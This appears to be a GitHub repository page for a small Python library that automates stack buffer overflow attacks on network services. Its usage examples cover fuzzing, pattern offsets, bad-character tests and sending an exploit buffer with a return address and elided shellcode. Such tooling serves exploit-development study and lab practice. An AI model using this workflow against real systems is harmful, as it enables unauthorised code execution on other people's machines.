Skip to content
/ buff Public

Buff 💪. A simple BOF library I wrote under an hour to help me automate with BOF attack.

License

Notifications You must be signed in to change notification settings

the-robot/buff

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

52 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

What is Buff?

A simple BOF library I wrote under an hour to help me automate with BOF attack.

It comes with fuzzer and a generic method to generate exploit easily.


Not all the methods are documented yet as I do not have time now. Feel free to read the code, it's very small code-base anyway :)

Usage

I made a template as well.

Setup Runner

import buff

runner = buff.Buff(target = ("127.0.0.1", 1337), prefix = "", postfix = "")

Fuzzer

runner.fuzz()

# you can set timeout, step_size, and sleep seconds
runner.fuzz(timeout = 5, step_size = 1000, sleep = 3)

# use custom fuzzer
def fuzzer(target: (str, int), timeout: int, prefix: str = "", postfix: str = "", step_size: int = 100, sleep: int = 1) -> None:
    ...

runner.setFuzzer(fuzzer)

Custom Sender

This sender method is used by sendPattern, sendBadChars and sendExploit methods.
You can look SLmail example for custom fuzzer and sender methods usage.

# custom sender method
def sender(target: (str, int), buffer: str) -> None:
    ...

runner.setSender(sender)

Sending Pattern

runner.sendPattern()

Finding Pattern Offset

BUFFER_SIZE = 2400
offset = buff.generator.findPatternOffset(BUFFER_SIZE, "386F4337")
print(offset)

Sending Bad Characters

runner.setBufferSize(2400)
runner.setEipOffset(1978)
runner.sendBadChars()

# you can also exclude by
runner.sendBadChars(exclude = ["\x42", "\x43"])

# change default EIP placeholder
runner.sendBadChars(fake_eip = "\x44\x44\x44\x44")

Sending Exploit

# Set buffer size
runner.setBufferSize(2400)

# Set EIP offset
runner.setEipOffset(1978)

# Set return address
eip_address = "\xaf\x11\x50\x62"
runner.setEipAddress(eip_address)

# Set padding
runner.setPaddingSize(16)

# Set exploit
exploit = ("\xdb\xde.....")
runner.setExploit(exploit)

runner.sendExploit()

About

Buff 💪. A simple BOF library I wrote under an hour to help me automate with BOF attack.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages